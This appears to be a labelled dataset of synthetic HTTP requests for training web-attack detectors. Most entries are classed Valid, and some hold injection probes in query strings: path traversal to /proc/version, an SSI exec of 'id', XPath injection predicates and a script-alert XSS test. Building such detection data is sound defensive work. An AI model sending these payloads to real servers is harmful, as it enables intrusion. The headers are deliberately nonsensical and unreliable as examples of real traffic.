Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 4.223.155.209
Cookie: ieEmuIlssbn=ooachr7eonurore;suwWttfarpdn0t=fca8bu;hn0tTgethctTtH=n;Rt=r_B20uN;hAfcpIe001ioE=$mlo0dNtinsertnskEhpositionyacceptd
Cookie2: $Version="859"
Date: Sun, 15 Feb 09 05:40:01 CET
ETag: W/"7U8lCc@WbWyv_96wzX"
Expect: 100-continue
From: ahe6lcme@tscunoU.st
If-Modified-Since: Tue, 01 Sep 09 04:14:27 CET
If-Unmodified-Since: Sun, 28 Nov 04 09:02:07 CET
If-Match: *
If-None-Match: *
If-Range: "zcx07QO8FhZ_bJf1I3D1"
Max-Forwards: 38
MIME-Version: 9.5
Pragma: fpe='ncq'
Proxy-Authorization: eqxrte snsH=briit
Authorization: Basic aXRsbzplNjlhc2g=
Range: 23407-76
Referer: /kiae3n/eIpyo/2o2i7/nnwspou.php3
TE: gzip,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.1 (Machintosh; U; PPC 3.2; ws-6o; rv:5.6.2) Gecko/29388419
UA-CPU: PowerPC
UA-Disp: 508,842,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 386x735
Via: hyN/7.2 207.61.16.205
Transfer-Encoding: compress
Upgrade: DoR/2.1, rahogo/2.6
Warning: 131 201.134.124.106 "nmLen" 
X-Forwarded-For: 98.230.255.210
X-Serial-Number: 29101464435877036
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12769
Start - Id: 21533
class: Valid
GET /epyee/9.LYNst49/lnhhxtd8t4E/ftpNQn/LFZX/rEeocsmrjseea/t@kWoy-QBK@Pi0l7/r4Wc5h/a5KVQ/mb.tsPJ@V8script9L@/_RBR0Pd/taeszLfn.shtml?I95G=top%3Bmli%3AossR&Q4janoussrlar=126&rtxtosmea7lZr7=23&od0=neIe&8sem=eiejEkOpae&mSa0i=s%3Bdocumentua&noinaltA=nl&7sw1xe=a8nc&cr=dse%27alj&9kfexsNo=81155176&y1aclse=6 HTTP/1.1
Host: 67.25.253.212
Connection: close
Accept: video/quicktime, application/*, text/*
Accept-Charset: x-mac-japanese;q=0.4, macintosh
Accept-Encoding: 
Accept-Language: o1Rhiy-rhAut1r;q=0.9, ttdihceq-9set
Cache-Control: no-transform
Client-ip: 190.4.211.183
Cookie: wherna2od4=631113;gEuAr7ggenah=462096765;int6mrAvy9h=;d)2eLiaahde;9iitbtk=130686;osl=qq6rmdndrtSmnGlEoe
Cookie2: $Version="74"
Date: Tue, 21 Feb 06 24:21:03 CET
ETag: W/"ntfELDStUc0DhxJ4BRh"
Expect: boozttd2=a8ite
From: secins@cI7fv.st
If-Modified-Since: Sat, 29 Jan 05 09:05:12 GMT
If-Unmodified-Since: Sun, 07 Mar 10 24:49:57 UTC
If-Match: *
If-None-Match: "JBvmlbwISQSEwpUCh"
If-Range: Sun, 11 Oct 09 07:43:04 CET
Max-Forwards: 417
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic ZnV0eGFyaW86aWVhcTE=
Authorization: Digest response="59B2D5a98de382fB994d36027dA8a2E7"
Range: -092,-75
Referer: http://BaesOlew.ch/rdsdcu/woHoo.rar
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.0 (Windows; U; Win98 9.2; 2i-l3; rv:2.7.5) Gecko/74045539
UA-CPU: StrongARM
UA-Disp: 974,667,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0542x2765
Via: 3.6 www.titatbQ.html
Transfer-Encoding: yutoa; sadpoahy=4shaqsoe
Upgrade: hhes/4.9
Warning: 989 95.146.49.238 "goslds92assa6" "Thu, 02 Oct 08 01:14:20 UTC"
X-Forwarded-For: 225.114.104.225
X-Serial-Number: 78550248370388060533
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21533
Start - Id: 36294
class: PathTransversal
GET /eBEgJ@eb8T@L8LN8/sonUtebaeodenrElEi/Zt0zUti/akATEFMZN/rnndmheadTeoe/ocZ4wAR/vosrr5so2kRonseebt/lb-AzWreW@9E/f3alt5.jpg?mdeu=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&83=ntesaedpnergs&ht=%5Bg&esQthmeda6sfte1=729294657&sA=teeoandloe%7C%5DebRs&Da@W=na6losidnnsebeo HTTP/1.1
Host: 75.178.162.204
Connection: neaa3e
Accept: application/*
Accept-Charset: isiri-3342;q=0.7, iso-8859-7;q=0.5, windows-1252, koi8-r
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=96501
Client-ip: 114.100.144.6
Cookie: 8iitiR1=t=%sek]zIcbgsoundtU>a sock_streamr
Cookie2: $Version="483"
Date: Thu, 11 Sep 08 02:12:32 UTC
ETag: W/"_CMpMj-5Yq9_H_Af87"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Tue, 23 Nov 04 14:56:00 GMT
If-Unmodified-Since: Mon, 05 Jul 04 19:09:17 UTC
If-Match: "kqQF5Mu_oj6sOLww24x4"
If-None-Match: *
If-Range: Sat, 23 Oct 04 14:34:43 GMT
Max-Forwards: 8
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic Ym1uYTpkaWVmc2Nv
Authorization: Digest nc=baEfBefD
Range: 48895-751657,65-
Referer: /aPta/eonet1/tailm/anzo/o8hneefz.php
TE: trailers
Trailer: Host
User-Agent: Mozilla/9.8 (X11; U; Open BSD i386 7.7; lr-qS; rv:5.7.6) Gecko/41244463
UA-CPU: MIPS
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 67inb/7.7 www.etnttw.js, 8.4 www.6alw.jpg, HTTP/6.8 50.224.35.30:1553
Transfer-Encoding: gzip
Upgrade: ye1nNS/5.5
Warning: 777 www.eraf47ht.html "lzrhseSsp9edvonjaeyx" "Fri, 05 Jun 09 03:03:54 UTC"
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36294
Start - Id: 40159
class: SSI
GET /lv4kON0NWQ/vB5rQwv4xcZwsPa/iKL.kDh8lcJEdvU9/eyVqP/6eeHEe/ee6/e5TO4GdDk9q/tk5-NH@kn5ApZ/x3YUcRdXYBnAsP5/nZtplyq5qIwX_/rVWzUVLKmYaawGs/slosaa.tiff?jitowstnrehr=h%7Clocation&lA3oehEr=0Tfo0dcrtia&reljqeo2=reea&ndi1=39311437&.nodebm1O3g=%3C%21+++%23%3C%21--%23exec+++++cmd%3D%22id%22--%3E&heyOhneegeee=3912563&acdellakEit=99983&bu7@Zrtg=44&9abIArrbd=woit&lFmochaKP=523142&wFamocha7H=849&iagi2sHbt=562019 HTTP/1.1
Host: 78.40.24.64
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: faotap9-au;q=0.1, i-iem5d
Cache-Control: only-if-cached
Client-ip: 12.182.155.135
Cookie: mznOmtiec2e=oqiuj d sfshutdown]ni;cm9oI=fg4nDtnah0e
Cookie2: $Version="8"
Date: Mon, 06 Nov 06 02:44:51 GMT
ETag: W/"fwPq9i.9FDenawS"
Expect: 0flsCa
From: stce@ygsk.st
If-Modified-Since: Mon, 23 Feb 09 15:22:16 UTC
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: "1cu-DfxpvmDwuPd8fOmp"
If-None-Match: *
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 4
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: ytbe8 eo2t=gnnhede
Range: 728-,7-688430
Referer: http://t2etHt.gov/eeoi/htfoeA/wteo.php
TE: gzip
Trailer: Warning
User-Agent: Mozilla/9.6 (X11; U; Solaris 1.0; rl-Nz; rv:2.1.7) Gecko/79671031
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 2.9 www.neST.htm, 3.6 www.dgul.css
Transfer-Encoding: compress
Upgrade: lindtc/2.8, 2eli/0.2, l1flm/2.2
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 73.204.141.133
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40159
Start - Id: 49266
class: XPathInjection
GET /z0P1TexecrUWne/rcp3507x.exe?6rfrmuom=fkJk13SN&sunitef1=Aoezssfgtstj&ItTCbeA=sg&e8xIvap=fe%27++or++1%3C+++rFesos%2Fhoish%2Fw%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D38%5D+++++or+++%27cGas%27+++%3D+++%27&aingeeaiC=oolorm HTTP/1.1
Host: 182.41.250.146
Connection: enre
Accept: text/plain, video/mpeg;q=0.3, application/postscript;q=0.1
Accept-Charset: cp-936
Accept-Encoding: gzip;q=0.0, compress, gzip;q=0.8, gzip
Accept-Language: *
Cache-Control: eri0scti=oneda
Client-ip: 8.241.86.122
Cookie: ehmprnmqaJetz=heAnUilinkEisd;UkeeAtgnem=15725
Cookie2: $Version="395"
Date: Mon, 21 Nov 05 13:56:56 CET
ETag: W/"U5U_78@j-0G5kJ9g"
Expect: GerE30=m8mee1ye
From: lqie@4vraituc.com
If-Modified-Since: Fri, 29 Apr 05 23:55:34 GMT
If-Unmodified-Since: Tue, 14 Oct 08 23:33:59 UTC
If-Match: "BDtvTsfxuvGBbLM"
If-None-Match: "DMd1uBrJCgw4A5B"
If-Range: "8bMzJAtr9LETKr2"
Max-Forwards: 949
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic bm9UdXk6cTBud210
Authorization: NTLM M2Jid2VpZzZzZHRtMWxTZWhpcGM3aWRwZXRCbG9mcm1lZWduZHJoamV5b3Q4dGM=
Range: 560-83908
Referer: /rtna/ssxem6e/39rltdDr/t6es8yn.js
TE: gzip;q=0.5
Trailer: TE
User-Agent: laab4tt4aa/8.8.6
UA-CPU: x86
UA-Disp: 8141,3666,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: 2.2 197.241.147.220
Transfer-Encoding: deflate
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49266
Start - Id: 18985
class: Valid
GET /ernor1nesbe/jtxiwrtosc/ibdttsH/uz8/atmjXM5zr/d1vv4wv3oJ6E5p4A0w/eAdT@3CH/opbVyWuSN0c/V6group bywcAaPSre.yD4.php4?erjlarsIttoeZ=atlepdtmvoxiieumac HTTP/1.1
Host: 241.43.202.25:80
Connection: keep-alive
Accept: image/*;q=0.4, text/*;q=0.6, application/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: mtl-rahL, agsap-a, nnsleqn-2sRasepu;q=0.5, aeD9ala-sznot;q=0.1, 5uys-hetnoTty;q=0.6
Cache-Control: no-transform
Client-ip: 125.240.132.23
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="652"
Date: Mon, 11 Dec 06 04:55:03 GMT
ETag: "tl3.Va1CRNawcF.FuL"
Expect: tsIdmot=s684y
From: l14gyjst@isddra.be
If-Modified-Since: Sun, 21 Mar 10 17:37:51 CET
If-Unmodified-Since: Wed, 24 Feb 10 24:29:49 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 08 Sep 09 08:41:00 GMT
Max-Forwards: 923
MIME-Version: 9.9
Pragma: t1w='osdnt79e'
Proxy-Authorization: NTLM a1RjaG9ib2pudDZvdGpDUjRhYWl4cnBpZWVydGtlc3Uz
Authorization: Digest username="lRiei"
Range: 63-4,19-3,96935-
Referer: /somop/mta04.gz
TE: deflate,trailers,deflate;q=0.5
Trailer: Accept-Charset
User-Agent: no4rQU@KMX http://www.eInr1eii.com
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9774x0474
Via: 7.3 113.141.185.52
Transfer-Encoding: compress
Upgrade: enfzlm/9.3, RMow/0.2, Fmr1/3.8, tsi/2.4, pil2/2.5
Warning: 231 www.oebeetlc.jpeg "ttllcvtieaktaidHen" 
X-Forwarded-For: 227.198.34.58
X-Serial-Number: 27260320301
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18985
Start - Id: 21270
class: Valid
GET /54x5p4M3QDmos@PT_Xz/s57rs/t4g/s8NkEF/T4metaN8d@/IiaHqlefgf/awuUdR/tTqt1s97Ue.html?ta=RnedneSet+o&cT7f6tdauplssx=oa&alEphlxuneNc=9511&sSdocumentWigQ5l19T=ebU19n&itomcyoa1sa=895&Gugeia=i5wgI HTTP/1.1
Host: 107.156.210.246
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: nstGfCSu-P;q=0.4, numo-st;q=0.7, eRnEhc-ces, gn3oem4y-leNm;q=0.7
Cache-Control: only-if-cached
Client-ip: 205.209.84.73
Cookie: heMenctwntieane=9tnog-ekm
Cookie2: $Version="6"
Date: Sat, 26 Mar 05 05:22:28 UTC
ETag: "Wp4kjMlL8y21Wia"
Expect: hOsusai=daoao;7tesylm=de1l
From: rodie@O0kE.st
If-Modified-Since: Fri, 02 Feb 07 05:58:32 CET
If-Unmodified-Since: Thu, 05 Jun 08 24:55:17 CET
If-Match: *
If-None-Match: "U2JLLedqAQnUmfF"
If-Range: "MNefeDsrRzZd5Pmi"
Max-Forwards: 96
MIME-Version: 6.6
Pragma: fSl='rlBaef'
Proxy-Authorization: Digest username="ounet"
Authorization: Basic czRpaGNwYW86c3kxdm1haA==
Range: 793-,8602-038713,9-
Referer: http://FoEitohn.fr/hAeok1/cos8o/c2wEP.tar.gz
TE: trailers
Trailer: Date
User-Agent: hietEAswmOttkiwc
UA-CPU: PowerPC
UA-Disp: 664,7142,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 714x7693
Via: FTP/9.8 30.200.118.169, 9.1 www.shAe.jpeg:938, 7.3 249.179.117.101
Transfer-Encoding: oshi1n; rodew9ru=sacE01
Upgrade: pfBcec/8.2
Warning: 031 41.122.125.127:7076 "Eiaoenuons" 
X-Forwarded-For: 172.206.4.103
X-Serial-Number: 900444
----: -----------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 21270
Start - Id: 28456
class: Valid
GET /fF2..cNtfSXiFHHB/csE0eaci7oc.js?rtreetr=536812&twme=ncre&s4sshtdht=45&gE4DTkLyP7PT=s&sEdy35=like%40UiRsbLroeff&46pZ8=e%3De&EHws2x7yACreplace=00364923&yrvei=srthr&36gwNaetentso1t=7iotefrwepo&metaR_el=XEhiUgmidlfa&HoI5=xft35I%3Ae7skabh9&tfi=guytdstsd7reshu HTTP/1.1
Host: www.agaglds0.com:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-9, ks_c_5601-1987;q=0.6, windows-1253, cp-950;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: Oe9-hdVv;q=0.8, nmeMu-p
Cache-Control: max-stale=6
Client-ip: 140.124.216.219
Cookie: hvaius=syRkKOrIw;snn=ac4tiseu;oh8oTseCMrc=2524
Cookie2: $Version="855"
Date: Thu, 13 Oct 05 06:07:57 GMT
ETag: "4ohLRNGxY-E4_hL"
Expect: 100-continue
From: 3teotee@motpa.ch
If-Modified-Since: Thu, 12 Apr 07 12:15:33 UTC
If-Unmodified-Since: Sat, 31 Oct 09 10:31:53 CET
If-Match: *
If-None-Match: "TjPXLw.WISD28S5Qisi"
If-Range: "7IIMLdtbEnvOcEvI"
Max-Forwards: 611
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="ltk2"
Range: 571439-,36777-,4088-2
Referer: http://saovSd.ch/f0xde/attaZn/jqneegnl/clhjo1qh/5Yevv.mdb
TE: deflate;q=0.0,chunked;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.5 (X11; U; SunOS sun4u 3.4; tw-Ef; rv:3.1.0) Gecko/56745596
UA-CPU: 68000
UA-Disp: 0681,480,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2738x559
Via: HTTP/6.7 www.smusTDmh.gif, 0.8 www.hoeki.jpeg
Transfer-Encoding: identity
Upgrade: rsc/6.4, MAieh/2.6, olg/0.2
Warning: 966 101.43.142.203 "tcetitxnsoj" "Tue, 14 Oct 08 17:34:51 UTC"
X-Forwarded-For: 84.7.158.77
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28456
Start - Id: 47688
class: XSS
GET /iwinntscriptS89@bmpassthru1oQoP/ryF.QW6/nD.-LQoe_9FzF1rawYpv/pEt-oHpyIVUFcacN@/t9jFbcdME7/mnoNeco5sTnnAgd/seMm/SobjectQliV5mpositionNd@V_/EawDO/bN2HiGgG/iinsert9uV0hneALkcT/iclOh.gif?boot.iniYmochaDeTnI=H+child&uC0=h&314NLuX@m=92830&shdiobou=%3Cscript++++%3Ealert+%28+++++%22urafm.Eygsnt%22%29%3C%2Fscript%3E&fM7woptGS=+k&ovN=2598&aetiSetewil=258271617 HTTP/1.1
Host: www.ueaiows.it
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: cp-950
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 45.106.75.118
Cookie: Eomdthteiacdi=oE3tr5bin;1ok=e/uevusr etg
Cookie2: $Version="3"
Date: Sat, 17 Jun 06 12:54:04 CET
ETag: "6U3@g.r9YVe.JQCtdKWO"
Expect: 100-continue
From: maxEoc8e@ae6eyisrl4.biz
If-Modified-Since: Thu, 15 Jan 04 04:11:42 UTC
If-Unmodified-Since: Tue, 27 Jan 04 02:38:57 UTC
If-Match: "cceikmvcl2_dRmdRVL-"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 9.8
Pragma: ctwS='4qsei'
Proxy-Authorization: sxorov avcea=rose
Authorization: rieHns v9imlro0=nyyermp
Range: 57-,235-9884,973-85
Referer: http://EootTeh.biz/wrwmzY/TaNypcN/b8ds/hiionjna.zip
TE: trailers,deflate;q=0.8,gzip;q=0.5
Trailer: From
User-Agent: Mozilla/7.2 (Windows; U; Win 9x 0.3; oa-li; rv:5.7.1) Gecko/08123689
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 934x7117
Via: FTP/1.1 www.e2ioE.shtml, HTTP/4.5 www.byateS.css, HTTP/9.4 213.68.31.224
Transfer-Encoding: compress
Upgrade: e33s9E/0.6
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47688
Start - Id: 44962
class: PathTransversal
GET /uzlylzjD70.Bd/sooduEaseint1rds/dsprTDXs1aPutqfdi/p.w4.shtml?sp6ech2=e%40trgw+&eixuey7nebiEe=seo+l%5B%26%3B&H0iaezTZ9nccp=9mEtrnn52i&otos=yoeensO&emtmoih=einlnebigao0q1&ttihee=7146683&rrtth3dVt=21757&el=5y6fobrdlocationdeict&tncr=9359&qf=lai&abibmtlits=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&rcrWTshs=t7ze&iCcnczan=t&abevt=nhoibdocument5&llS19iureroe=%3Elc95o+ecopy HTTP/1.0
Host: 126.193.173.90
Connection: tsa1srb
Accept: text/*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: eEc='uch'
Client-ip: 141.6.207.75
Cookie: btz=998;ri29itqihAelex=723979;eo=9;Nhr0doaddeseokn=8selreeesetssc
Cookie2: $Version="02"
Date: Thu, 26 Oct 06 16:10:17 UTC
ETag: W/"@Ha_U7Oeumx8BwDN1Ut."
Expect: 100-continue
If-Modified-Since: Thu, 29 Sep 05 11:41:28 UTC
If-Unmodified-Since: Fri, 10 Jun 05 11:58:57 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Jul 08 15:39:37 CET
Max-Forwards: 5
MIME-Version: 1.3
Pragma: l4hrjfnb=he
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: 692467-8,088341-5,956298-14
Referer: http://tntimte.com/dhed2me/idra.jsp
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.7 (Machintosh; U; PPC Mac OS X 7.5; om-ls; rv:7.2.4) Gecko/83868430
UA-CPU: Sparc
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 298x509
Via: dSS/5.0 184.217.61.230:0321
Transfer-Encoding: deflate
Upgrade: mAelaA/3.4, 5lote/9.4, GsasM/7.6, ho40u/4.6, tead/1.7
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 9376895954650597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44962
Start - Id: 17965
class: Valid
GET /PNMkh/otE07/vcNImxteEM/oi.mspx?rdqEjnjlol9o7=5834145325&4objs9e=8&wAr8es=32912&1likIdm8p=lyjhrcatfb%7Ebha%27e+rnr&erSesxAno=9602667701&wm=z%29gr&7eeaesonysloh=s8%5Dl0 HTTP/1.0
Host: 18.90.223.220:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1250;q=0.8, iso-8859-3, gb2312, hz-gb-2312
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 111.190.89.167
Cookie: ainekycihn=38801963;tsu=61382999;e0xo=uit;7es=e9ioe@;pjbe4q8s6anpent=dt
Cookie2: $Version="5"
Date: Wed, 25 Mar 09 01:32:08 GMT
ETag: W/"NWVkOQGjqFY6iG4N"
Expect: 100-continue
From: 5t4i6M@nsferamm.st
If-Modified-Since: Fri, 27 Feb 04 07:03:37 CET
If-Unmodified-Since: Fri, 02 Sep 05 17:16:58 GMT
If-Match: "Dl.3Zrox5s.MYfE94"
If-None-Match: *
If-Range: Thu, 29 Dec 05 08:52:44 GMT
Max-Forwards: 444
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: ahhtnk neqxl=dflxtij8
Authorization: NTLM Y2tiYlRuZXcxZW5yZW9zcEF5ZTVvYkh0ZXJvTjRic3huZWtlc3dob0U=
Range: 7-
Referer: /tengv/rEa3ciea/nlthtr2/y24e4h9p.gif
TE: trailers,trailers,deflate
Trailer: Via
User-Agent: Mozilla/5.5 (compatible; Konqueror/9.7; Linux i386; ktnnicnu; yoAdeelg)
UA-CPU: PowerPC
UA-Disp: 5395,1752,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5744x7610
Via: HTTP/0.4 68.94.111.165, 1.8 155.46.29.140, FTP/7.8 192.242.162.57
Transfer-Encoding: gzip
Upgrade: n1e7/2.9, i0t/7.2, at8h/8.4, saae/0.1, F8sw4m/0.9
Warning: 243 www.t3moNn4.shtml:671 "6wh40ksieyhlBiAly" "Thu, 09 Oct 08 24:43:53 CET"
X-Forwarded-For: 58.72.123.218
X-Serial-Number: 126359960937
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17965
Start - Id: 48995
class: XPathInjection
GET /xtchlqtberee/uroeaMeibaAp/fEjt6tt/pWa7k33.cfm?neis5wjyionaz=libciframeaccepta%3C&evweafsdnmi2v=7099998552&ns0e=2++or+4hH%2Frah%2Ftb%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D3%5D+++or+++++79%3D HTTP/1.1
Host: 252.131.196.11
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: windows-1253;q=0.8, iso-8859-1, windows-1251;q=0.4, macintosh;q=0.5
Accept-Encoding: gzip;q=0.1, identity;q=0.2
Accept-Language: r-fPn;q=0.3
Cache-Control: no-store
Client-ip: 22.128.202.196
Cookie: dsi1yu20hi=848;Sie=rnd\tisystemlrrc
Cookie2: $Version="778"
Date: Thu, 01 Jul 04 21:08:08 CET
ETag: W/"c@KYsDDHEulcjRLzw"
Expect: 100-continue
From: hTposhor@lpiuhs.biz
If-Modified-Since: Fri, 19 Nov 04 17:31:39 UTC
If-Unmodified-Since: Sat, 01 Aug 09 13:21:54 UTC
If-Match: *
If-None-Match: "1MnP-BOkAvamJRNfNEi"
If-Range: *
Max-Forwards: 9491
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: Digest opaque="iwaw"
Range: 23-,057-,45-
Referer: /g9cno.asmx
TE: deflate;q=0.0
Trailer: From
User-Agent: ercoeasrn (6cBH-nqK; sf5NrxTe)
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6996x6974
Via: HTTP/8.6 www.nric.html
Transfer-Encoding: thfedh
Upgrade: ttdCe/0.8, oa8sie/8.1, wteoa/2.2, Lsat/9.3
Warning: 728 157.50.122.194 "mlteR2oivlsnuennt" "Wed, 05 Jan 05 24:55:15 GMT"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48995
Start - Id: 18060
class: Valid
GET /flg.Ixb3G/oteDleogaeovyhnln/e7nXQLdUI6O@PF.gif?afcOseeelu=ifrom%7Cve%25+4pu&acniohyowngIlbt=1524&3positionameta=oe&htn=8361lohhsl&1seuriSedn8T5bi=renlehlhwetesbtE&bySJ=0d3&udnt=78&man1kein1=8irdTotstnu&kda8seerhTasbv=itdtesOjt1tlamnts&a7hsori=iEIryY&YVp5ORIV4=283428 HTTP/1.1
Host: www.elneaisjIa.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=820
Client-ip: 6.255.150.52
Cookie: 0aSopKZB=meh=;sityeLy2q=8eE;sa9to9iVitRtieo=rhcnelr5nie7a;OIxtermDiNo=0;7y=oe;se<e rm8et2hlNn
Cookie2: $Version="70"
Date: Mon, 10 Jan 05 17:21:31 UTC
ETag: "SiTkbb.5aR7i804En"
Expect: 100-continue
From: ubo9@noxriwRe.cz
If-Modified-Since: Thu, 25 Dec 08 11:19:12 UTC
If-Unmodified-Since: Fri, 21 Apr 06 11:24:37 UTC
If-Match: "Neyg2-t0-.kHSuV21"
If-None-Match: "cKy4_rCKIq6hsb0M."
If-Range: "J4JheqD3in-Znai8oAE"
Max-Forwards: 5608
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: nagit ilrhne=uTamR
Authorization: NTLM aGVpcm9ucnRuNmlhZzNucnlkdG5mczlvdDR0d3J0ZWhxMHRldGdwdEVGb3Q=
Range: -498682,294755-,-12868
Referer: /ilweoei/8caxbleg/ekqr.bin
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/3.6 (Machintosh; U; PPC Mac OS X 9.2; gr-na; rv:5.1.8) Gecko/55402540
UA-CPU: PowerPC
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 519x975
Via: 0.1 66.161.71.41, ikne/6.1 www.oNnT.png:3198
Transfer-Encoding: hpt5i
Upgrade: tdlvc/2.4, nwdaao/9.3
Warning: 781 78.175.59.108 "s0atoompRe" 
X-Forwarded-For: 169.12.78.179
X-Serial-Number: 507009022926065
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18060
Start - Id: 6872
class: Valid
POST /xDmJCOmLsn0TMyMLGOD/bAx/uaeuteundaso1yii/fahtm/qNrd2XLQ_Ak@Np/eMwWcT2yVyWgUO/u1XvKOSIrfXEz/deuH.t-jVC@.nsf? HTTP/1.0
Content-Length: 126
Content-Language: e,ligihiha
Content-Encoding: identity
Content-Location: http://wzrqj.uk/udEisd/eoww9I/1ahff.css
Content-MD5: bjhMaW55NXhlZXhzSGVqYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Mar 05 04:35:35 CET
Last-Modified: Sat, 17 Jan 04 07:46:02 UTC
Host: www.m1pnlfnN.be
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.2, compress;q=0.7
Accept-Language: l1dngS-hc, 3-oGs;q=0.0, hwl-yhfin5ey;q=0.3, stec-i0;q=0.1
Cache-Control: no-store
Client-ip: 35.121.149.125
Cookie: tNT=0swnicsfn5;telnetBIrHinclude=nxDqGEjA68V;Ajh=aZesxn;iynu8hrcrlot2=4fr ~aned8a
Cookie2: $Version="579"
Date: Fri, 28 Jul 06 15:20:34 GMT
ETag: "HGW9uor.ZlpYfpa4xS2"
Expect: yC9puyen
From: 1m1ll@ibidpns.org
If-Modified-Since: Thu, 03 Feb 05 15:55:10 UTC
